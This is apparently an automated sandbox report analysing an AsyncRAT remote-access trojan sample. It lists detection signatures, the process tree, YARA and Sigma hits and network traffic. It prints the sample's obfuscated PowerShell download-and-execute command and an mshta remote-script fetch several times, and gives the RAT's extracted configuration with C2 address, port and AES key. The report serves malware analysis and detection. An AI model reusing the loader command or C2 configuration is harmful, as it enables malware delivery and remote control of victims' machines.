
Analysis Report xGrfj8RvYg.exe

Overview

General Information

Sample Name: xGrfj8RvYg.exe
Analysis ID: 433020
MD5: 722603aa75534bec9d1191f062fb2c03
SHA1: 321ea5aa8368f394dcbdcc6ce7ebaab89861150d
SHA256: 3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
Tags: AsyncRAT, exe, RAT

Detection

AsyncRAT
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xGrfj8RvYg.exe (PID: 4832 cmdline: 'C:\Users\user\Desktop\xGrfj8RvYg.exe' MD5: 722603AA75534BEC9D1191F062FB2C03)
    • mshta.exe (PID: 1276 cmdline: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 3468 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
          • aspnet_compiler.exe (PID: 6396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
          • aspnet_compiler.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "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", "ServerSignature": "hb4rbDi2yorRia4zVii6fBe5zR5qZuT/oNzKkm5RCPxVI+DpAg6tP0HKmjqKbYbfXixb6DODIWmirNXfb6RavFFZFj5L1BSmGSCWmeVDM/IkG1v7H8053Uky0QHQ2bPzEIhio/2bZG7nxydLDiWz7jOA5hTZddxPN8Br/tFDBgOA2YvoFolDN/SyqFz61tucLLLKImugUQPB4sHE/xkAyXi1gtGQ/16xTSWjEKwIRYr/7rvSmfWpY/5oDiJvkWS/1MZAIQNLY1fyi9FRErVVeUnnTikLjZhOkouk7/QdJsJez78RuLjg+I5tTMBYhxG6q81sg7SrqotPY0sK3ZZAKaU4Vrmy1LKrBMpNQv3JiIWlI/lS56GB2bN/TA9sLcKAATEeWREuz8l/bJURfyZFk91OWqZ1mHwEXQGj5Wttm8jf+gG2TbMHgCPcpwFUFMqB7fSQIKv+pU1KOAvU64CUeLTzks4X5N8aHvduxLez78VMAyXSa2PWbv9znaxZZWCGScStHepOMiR4AXViv5F4HTb8v2nZ2x60Q0rMNmZ3T1yMA+WbdCeNBQDFD8roIU7iXGsheZ3Cfnd9MOYde+KESXBKyoZGdGoocdgu9NTzxVBAZ9fOUEXjXRfS6fh+dnAJc0GNGimVg/1EX6Q+xeKnpb2b73IU7G28wz78gQndt1Y=", "Group": "Default"}

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt
Rule: webshell_asp_obfuscated
Description: ASP webshell obfuscated
Author: Arnim Rupp
Strings:
  • 0x55:$tagasp_long20: <script language="VB
  • 0xdc:$asp_payload11: WScript.Shell
  • 0xce:$asp_multi_payload_one1: CreateObject
  • 0xce:$asp_multi_payload_four1: CreateObject
  • 0xce:$asp_cr_write1: CreateObject(
  • 0x220:$m_multi_one1: Replace(
  • 0x282:$m_multi_one1: Replace(
  • 0x2af:$m_multi_one1: Replace(
  • 0x2fb:$m_multi_one1: Replace(

Memory Dumps

Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x90a8:$s1: pOWeRsHeLL

Source: 00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x146:$s1: pOWeRsHeLL

Source: 00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x70a8:$s1: pOWeRsHeLL

Unpacked PEs

Source: 23.2.aspnet_compiler.exe.400000.0.unpack
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 23.0.aspnet_compiler.exe.400000.0.unpack
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 
https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
Sigma detected: Suspicious PowerShell Command Line
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 
ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
Sigma detected: Non Interactive PowerShell
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 
ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468

Signature Overview

AV Detection:

Found malware configuration
          Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93
O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": "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", "Group": "Default"}
Source: 23.2.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: unknown; HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.112:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: xGrfj8RvYg.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 216.230.75.62:1107 -> 192.168.2.3:49747
Source: global traffic; TCP traffic: 192.168.2.3:49747 -> 216.230.75.62:1107
Source: Joe Sandbox View; IP Address: 207.241.227.126
Source: Joe Sandbox View; IP Address: 207.241.227.112
Source: Joe Sandbox View; IP Address: 207.241.224.2
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; HTTPS traffic detected: 207.241.227.119:443 -> 192.168.2.3:49719 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.227.126:443 -> 192.168.2.3:49727 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.3:49728 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 207.241.232.198:443 -> 192.168.2.3:49729 version: TLS 1.0
Source: unknown; TCP traffic detected without corresponding DNS query: 216.230.75.62
Source: unknown; DNS traffic detected: queries for: ia601502.us.archive.org
Source: powershell.exe, 00000003.00000002.478315679.0000027D87F6F000.00000004.00000001.sdmp; String found in binary or memory: http://archive.org
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000003.00000003.207486771.0000027D9F6B6000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000017.00000002.469001250.0000000000E65000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000002.00000002.216634769.0000020091AF8000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.477549946.0000027D87D00000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: mshta.exe, 00000002.00000002.216660984.0000020091B0A000.00000004.00000020.sdmp, powershell.exe, 00000003.00000002.469024271.0000027D856CD000.00000004.00000020.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.484398533.0000027D9F8A2000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: mshta.exe, 00000002.00000002.217675863.0000020893C10000.00000004.00000001.sdmp; String found in binary or memory: http://crl.goi
